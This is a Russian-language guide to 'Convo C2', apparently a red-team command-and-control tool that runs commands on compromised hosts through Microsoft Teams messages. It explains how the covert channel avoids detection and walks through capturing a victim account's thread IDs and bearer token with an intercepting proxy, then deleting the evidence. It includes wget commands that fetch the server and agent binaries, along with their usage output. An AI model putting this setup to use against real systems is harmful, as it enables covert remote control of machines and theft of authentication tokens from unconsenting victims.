Convo C2
Инфраструктура C2, позволяющая сотрудникам Red Team выполнять системные команды на скомпрометированных хостах с помощью Microsoft Teams.
Привязывает URL-адреса изображений, запуская внешние запросы к серверу C2. Отсутствие прямой связи между жертвой и злоумышленником в сочетании с тем фактом, что жертва отправляет только http-запросы на серверы Microsoft, а антивирусы не просматривают лог-файлы MS Teams, затрудняет обнаружение.
1. Создайте командный канал с помощью Webhook для входящих сообщений рабочего процесса
2. Щелкните правой кнопкой мыши на трех точках, затем выберите "Рабочие процессы"
3. В строке поиска введите "Webhook" и нажмите на "Опубликовать на канале, когда будет получен запрос webhook"
4. Продолжайте использовать настройки по умолчанию и, наконец, скопируйте URL-адрес
Теперь необходимо получить идентификаторы и токен аутентификации:
2. После выбора учетной записи жертвы, когда веб-прокси-сервер перехватывает запросы, вы можете отправить фиктивное сообщение
3. Сохраните два идентификатора, указанные в запросе api/chatsvc/emea/v1/threads
, а затем УДАЛИТЕ запрос. Токен аутентификации будет являться токеном-носителем того же запроса.
wget https://github.com/cxnturi0n/convoC2/releases/download/v0.1.0-alpha/convoC2_server_amd64.tar.gz tar -xzvf convoC2_server_amd64.tar.gz --one-top-level
Command: convoC2_server_amd64 -h Usage of convoC2 server: -t, --msgTimeout How much to wait for command output (default 30 s) -b, --bindIp Bind IP address (default 0.0.0.0)
wget https://github.com/cxnturi0n/convoC2/releases/download/v0.1.0-alpha/convoC2_agent.tar.gz tar -xzvf convoC2_agent.tar.gz --one-top-level
Command: convoC2_agent.exe -h Usage of convoC2 agent: -v, --verbose Verbose logging (default false) -s, --server C2 server URL (i.e. http://10.11.12.13/) -t, --timeout Teams log file polling timeout [s] (default 1) -w, --webhook Teams Webhook POST URL -r, --regex Regex to match command (default "<span[^>]*aria-label=\"([^\"]*)\"[^>]*></span>")
*Инструкция также дублированы в архив на случай удаления основной темы на github.